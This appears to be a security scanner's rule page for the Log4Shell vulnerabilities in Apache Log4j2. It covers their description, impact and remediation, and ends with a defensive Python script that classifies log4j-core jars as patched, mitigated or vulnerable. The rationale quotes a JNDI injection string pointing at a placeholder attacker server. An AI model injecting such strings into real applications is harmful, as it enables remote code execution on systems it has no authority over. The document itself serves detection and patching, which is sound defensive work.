Log4Shell

ID

log4shell

Severity

critical

Kind

Remote Code Execution

CWE

117

Description

  • Log4Shell (CVE-2021-44228): JNDI features in Apache Log4j2 at or before 2.14.1, as used in configuration, log messages, and parameters, do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default.

  • Log4Shell (CVE-2021-45046): The fix for CVE-2021-44228 in Apache Log4j 2.15.0 was found to be incomplete in certain non-default configurations. This could allow attackers to craft malicious input data using a JNDI Lookup pattern, resulting in an information leak and remote code execution in some environments.

Rationale

Log4Shell enables remote code execution by exploiting JNDI lookup functionality in vulnerable Log4j versions. Attackers inject specially crafted strings like ${jndi:ldap://malicious-server/exploit} into any logged data (HTTP headers, form fields, user-agent strings).

When Log4j processes these strings, it performs a JNDI lookup that contacts the attacker’s server and loads malicious Java code, granting the attacker complete control over the vulnerable system. This critical vulnerability affects countless internet-facing applications and has been actively exploited in the wild.

Remediation

Upgrade Log4j2 to version 2.17.1 or newer. In previous releases (>2.10), this behavior can be mitigated by setting the system property "log4j2.formatMsgNoLookups" to "true", or by removing the JndiLookup class from the classpath (for example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).

Java 8u121 (see Release Notes) protects against remote code execution by defaulting com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase to false.
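As an added check that is not part of this rule's text, the following Python script classifies a log4j-core jar the way the remediation above describes: it reads Implementation-Version from the jar manifest (assumed here to be present, as in real log4j-core builds), looks for the JndiLookup class path, and treats 2.17.1 or newer as patched, an older jar without the class as mitigated by class removal, and anything else as vulnerable. The build_jar helper constructs minimal fake jars so the check runs offline.

```python
import io
import re
import zipfile

# Path inside log4j-core where the vulnerable lookup class lives (from the remediation text)
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
FIXED_VERSION = (2, 17, 1)  # first release the remediation asks for

def parse_version(text):
    """Turn '2.14.1' into (2, 14, 1); missing parts default to 0."""
    parts = re.findall(r"\d+", text or "")
    nums = [int(p) for p in parts[:3]]
    return tuple(nums + [0] * (3 - len(nums)))

def manifest_version(zf):
    """Read Implementation-Version from META-INF/MANIFEST.MF, or None if absent."""
    try:
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    for line in manifest.splitlines():
        if line.lower().startswith("implementation-version:"):
            return line.split(":", 1)[1].strip()
    return None

def assess_jar(data):
    """Classify a log4j-core jar (bytes) by manifest version and JndiLookup presence."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        has_lookup = JNDI_LOOKUP in zf.namelist()
        version = manifest_version(zf)
    if version is not None and parse_version(version) >= FIXED_VERSION:
        return "patched"          # 2.17.1+ still ships the class, but hardened
    if not has_lookup:
        return "mitigated-class-removed"  # zip -d workaround applied
    return "vulnerable"           # old version with the lookup class present

def build_jar(version, include_lookup):
    """Construct a minimal fake log4j-core jar (constructed test data, not a real build)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        if include_lookup:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # class-file magic only
    return buf.getvalue()

if __name__ == "__main__":
    for ver, has in [("2.14.1", True), ("2.14.1", False), ("2.15.0", True), ("2.17.1", True)]:
        print(ver, "JndiLookup present" if has else "JndiLookup removed", "->", assess_jar(build_jar(ver, has)))
```

Note that a jar on 2.15.0 with the class still present is reported as vulnerable, matching the incomplete fix described under CVE-2021-45046.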